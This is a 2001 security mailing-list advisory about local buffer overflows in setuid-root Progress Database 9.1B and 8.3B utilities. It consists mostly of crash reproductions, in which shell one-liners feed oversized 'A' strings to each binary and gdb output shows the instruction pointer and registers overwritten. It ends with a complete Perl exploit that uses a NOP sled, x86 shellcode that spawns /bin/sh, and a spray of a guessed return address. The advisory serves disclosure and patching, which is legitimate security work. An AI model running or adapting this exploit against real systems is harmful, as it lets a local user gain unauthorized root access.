[UNIX] Progress Database Local Buffer Overflow

From: support@securiteam.com
Date: 11/13/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] Progress Database Local Buffer Overflow
Message-Id: <20011113180935.42366138BF@mail.der-keiler.de>
Date: Tue, 13 Nov 2001 19:09:35 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Progress Database Local Buffer Overflow
------------------------------------------------------------------------

SUMMARY

Several security vulnerabilities in applications that are shipped with the
Progress Database enable local attackers to launch a buffer overflow
attack and execute arbitrary code.

DETAILS

Vulnerable systems:
Progress version 9.1B

Immune systems:
Progress version 9.1C

Example:
# gdb /usr/dlc/bin/_mpros core
Core was generated by `/usr/dlc/bin/_mprosrva
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb) q
[root@localhost /root]# /usr/dlc/bin/_mprosrva `perl -e 'print "A" x 5746'
`BBBB
BBBB == 0x42424242 or my eip

buffer is 1143 chars to begin overwrite eax 5746 to overwrite eip

(gdb) info registers
eax 0x80b3c80 134954112
ecx 0xbffff4f4 -1073744652
edx 0x480b5e31 1208704561
ebx 0x1 1
esp 0xbfffdbc0 0xbfffdbc0
ebp 0xbfffdbe0 0xbfffdbe0
esi 0x2 2
edi 0xbfffdcf4 -1073750796
eip 0x42424242 0x42424242
eflags 0x10206 66054
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0

below are Several more examples

# uname -a
SCO_SV scosysv 3.2 5.0.5 i386
# ls -al /usr/dlc/bin/preserve
-rwxr-xr-x 1 root sys 2708 Jan 9 15:29
/usr/dlc/bin/proserve
# /usr/dlc/bin/proserve `perl -e 'print "A" x 3000'`
PROGRESS Version 9.1B as of Sun Dec 3 20:27:14 EST 2000
Memory fault - core dumped
#

------------------

 /usr/dlc/bin/_mprshut `perl -e 'print "A" x 2000'`
Memory fault - core dumped

-----------------------------------

 /usr/dlc/bin/_mprosrv `perl -e 'print "A" x 2000'`
Memory fault - core dumped

-------------------

 /usr/dlc/bin/_probuild a `perl -e 'print "A" x 2000'`
Memory fault - core dumped

--------------------

 /usr/dlc/bin/prodb a `perl -e 'print "A" x 2000'`
Memory fault - core dumped

below this line is all version 8.3b

-rwsrwxr-x 1 root root 508151 Nov 10 1999
/usr/dlc/bin/_dbutil*
-rwsrwxr-x 1 root root 557075 Nov 10 1999
/usr/dlc/bin/_mprosrv*
-rwsrwxr-x 1 root root 561294 Nov 10 1999
/usr/dlc/bin/_mprosrva*
-rwsrwxr-x 1 root root 604635 Nov 10 1999
/usr/dlc/bin/_mprshut*
-rwsrwxr-x 1 root root 2574331 Nov 10 1999
/usr/dlc/bin/_probuild*
-rwsrwxr-x 1 root root 2986163 Nov 10 1999
/usr/dlc/bin/_progres*
-rwsrwxr-x 1 root root 2924760 Nov 10 1999
/usr/dlc/bin/_progresa*
-rwsrwxr-x 1 root root 971209 Nov 10 1999
/usr/dlc/bin/_proutil*
-rwsrwxr-x 1 root root 686582 Nov 10 1999
/usr/dlc/bin/_rfutil*
-rwsrwxr-x 1 root root 122260 Nov 10 1999
/usr/dlc/bin/prodb*
-rwsrwxr-x 1 root root 134337 Nov 10 1999
/usr/dlc/bin/prolib*

[root@localhost /root]# /usr/dlc/bin/prolib library-name `perl -e 'print
"A" x 2000'`
Invalid prolib command
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAAAAAAAAAAA

Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/prolib core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/prolib library-name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x41414141 in ?? ()

---------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_probuild sports `perl -e 'print "A"
x
1200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_probuild core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_probuild sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x400905c7 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
(gdb)

---------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_progres sports `perl -e 'print "A" x
1200'`
Segmentation fault (core dumped)

[root@localhost /root]# gdb /usr/dlc/bin/_progres core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_progres sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x400905c7 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
(gdb)

------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_progresa sports `perl -e 'print "A"
x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_progresa core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_progresa sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585

--------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_dbutil prorest sports `perl -e
'print
"A" x 4200'`
** Cannot find or open file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
)#w:)#w:AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA

SYSTEM ERROR: Memory violation. (49)
** Save file named core for analysis by Progress Software Corporation.
(439)
Quit (core dumped)

[root@localhost /root]# gdb /usr/dlc/bin/_dbutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_dbutil prorest sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA'.
Program terminated with signal 3, Quit.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x400590d1 in kill () from /lib/libc.so.6
(gdb) info register edi
edi 0x41414141 1094795585

-----------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_proutil sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_proutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_proutil sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()

(gdb) info register eax
eax 0x41414141 1094795585

-------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_rfutil sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_rfutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_rfutil sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x400905ad in ?? ()

(gdb) info register eax
eax 0x41414141 1094795585

--------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/prodb sports `perl -e 'print "A" x
4200'`

The database name is too long.
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/prodb core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `AAAAAAAAAAAAAAA AAAAAAAAAAAAA/.db.bi.tl.lg.lk
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()

(gdb) info register eip
eip 0x41414141 0x41414141

-----------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_mprosrv sports `perl -e 'print "A"
x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrv core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprosrv sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_mprosrva sports `perl -e 'print "A"
x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrva core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprosrva sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585

---------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_mprshut sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprshut core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprshut sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40090590 in ?? ()
(gdb) info register eax
eax 0x41414141 1094795585
(gdb)

Exploit:
#!/usr/bin/perl
# Progress 8 and 9 test exploit code
# Proof of concept by krfinisterre@checkfree.com

$len = 481; # Sufficient to overwrite the return value.
$nop = "\x90";
$ret = 0xbfffe208; # Return Value / ESP / Stack Pointer.

$shellcode=
"\x89\xe6".
"\x83\xc6\x30".
"\xb8\x2e\x62\x69\x6e".
"\x40".
"\x89\x06".
"\xb8\x2e\x73\x68\x21".
"\x40".
"\x89\x46\x04".
"\x29\xc0".
"\x88\x46\x07".
"\x89\x76\x08".
"\x89\x46\x0c".
"\xb0\x0b".
"\x87\xf3".
"\x8d\x4b\x08".
"\x8d\x53\x0c".
"\xcd\x80";

if (@ARGV < 1) {
    print("Usage: $0 <offset>\n");
    exit(1);
}

( $offset) = @ARGV;

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));

$address = sprintf('%lx', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

$exploit_string = "a $buffer";

system("echo -e \"$exploit_string\"");

ADDITIONAL INFORMATION

The information has been provided by <mailto:krfinisterre@checkfree.com>
krfinisterre.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: process hanging on 7.2-PRERELEASE
    ... GDB is free software, covered by the GNU General Public License, and you are ... There is absolutely no warranty for GDB. ... Loaded symbols for /lib/libgcc_s.so.1 ... Reading symbols from /lib/libthr.so.3...done. ...
    (freebsd-stable)
  • Re: vulndev1.c solution (warning SPOILER)
    ... Segmentation fault. ... Reading symbols from /lib/ld-linux.so.2...done. ... Just displaying the shellcode and it's length... ...
    (Vuln-Dev)
  • Re: dialog4ports crashing in head recently
    ... GDB is free software, covered by the GNU General Public License, and you are ... There is absolutely no warranty for GDB. ... Reading symbols from /lib/libncursesw.so.8...done. ... Loaded symbols for /lib/libncursesw.so.8 ...
    (freebsd-current)
  • Re: Administrivia: List Announcement
    ... It's very interesting that I run the same program on a Linux and on a AIX ... Segmentation fault ... GNU gdb Red Hat Linux ... Reading symbols from /lib/i686/libc.so.6...done. ...
    (Vuln-Dev)
  • dialog4ports crashing in head recently
    ... GDB is free software, covered by the GNU General Public License, and you are ... There is absolutely no warranty for GDB. ... Reading symbols from /lib/libncursesw.so.8...done. ... Loaded symbols for /lib/libncursesw.so.8 ...
    (freebsd-current)